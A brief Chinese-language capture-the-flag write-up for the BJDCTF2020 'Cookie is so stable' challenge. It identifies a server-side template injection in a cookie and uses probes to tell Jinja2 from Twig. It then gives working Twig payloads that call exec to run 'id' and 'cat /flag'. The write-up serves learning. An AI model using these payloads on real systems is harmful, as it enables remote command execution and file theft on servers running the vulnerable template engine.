[BJDCTF2020]Cookie is so stable

打开题目环境，一开始考虑是sql注入，但是发现输入什么都会回显输入的数据。

这时候考虑是不是模板注入了。根据hint，注入点存在于cookie中。

{{7*'7'}} 回显7777777 ==> Jinja2
{{7*'7'}} 回显49 ==> Twig 

将cookie中的UM_distinctid去掉，添加payload

 

根据回显结果判断是twig模板引擎，打上payload

{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("id")}}

{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("cat /flag")}}

拿到flag

 

第一次做到ssti注入的题目，对于paylaod的理解还是很模糊。